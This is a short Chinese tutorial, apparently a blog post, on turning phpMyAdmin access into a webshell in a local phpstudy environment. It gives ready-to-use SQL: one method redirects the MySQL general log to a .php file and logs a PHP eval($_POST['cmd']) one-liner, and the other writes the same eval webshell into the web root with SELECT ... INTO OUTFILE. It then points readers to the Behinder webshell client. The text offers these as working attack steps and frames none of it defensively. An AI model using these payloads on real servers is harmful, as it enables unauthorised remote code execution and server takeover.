常见cms漏洞之PhPMyadmin

环境phpstudy

安装后直接访问即可密码为mysql的密码,在小皮中即可查看

通过日志文件拿Shell

利用mysql日志文件写shel,这个日志可以在mysql里改变它的存放位置,登录phpmyadmin可以修改这个存放位置,并且可以修改它的后缀名。所以可以修改成php的后缀名就能获取一个webshell。

把值修改为on,以及www下的php文件

然后去select语句

复制代码
select "<?php phpinfo();eval($_POST['cmd']);?>"

导入导出拿WebShell

1.首先判断mysql位置

复制代码
select @@datadir

2.猜测web路径猜测web路径扩展的同级目录下存在www目录

复制代码
C:\phpstudy_pro\WWW\222.php

3.写入webshell

复制代码
select  "<?php phpinfo();@eval($_POST[cmd]);" into outfile "C:/phpstudy_pro/WWW/222.php"

对webshell使用冰蝎吧!

相关推荐
CYRUS_STUDIO18 小时前
用 Frida 控制 Android 线程:kill 命令、挂起与恢复全解析
android·linux·逆向
CYRUS_STUDIO18 小时前
Frida 实战:Android JNI 数组 (jobjectArray) 操作全流程解析
android·逆向
用户091 天前
Gradle Cache Entries 深度探索
android·java·kotlin
循环不息优化不止1 天前
安卓 View 绘制机制深度解析
android
叽哥1 天前
Kotlin学习第 9 课:Kotlin 实战应用:从案例到项目
android·java·kotlin
雨白1 天前
Java 线程通信基础:interrupt、wait 和 notifyAll 详解
android·java
诺诺Okami2 天前
Android Framework-Launcher-UI和组件
android
潘潘潘2 天前
Android线程间通信机制Handler介绍
android
潘潘潘2 天前
Android动态链接库So的加载
android
潘潘潘2 天前
Android多线程机制简介
android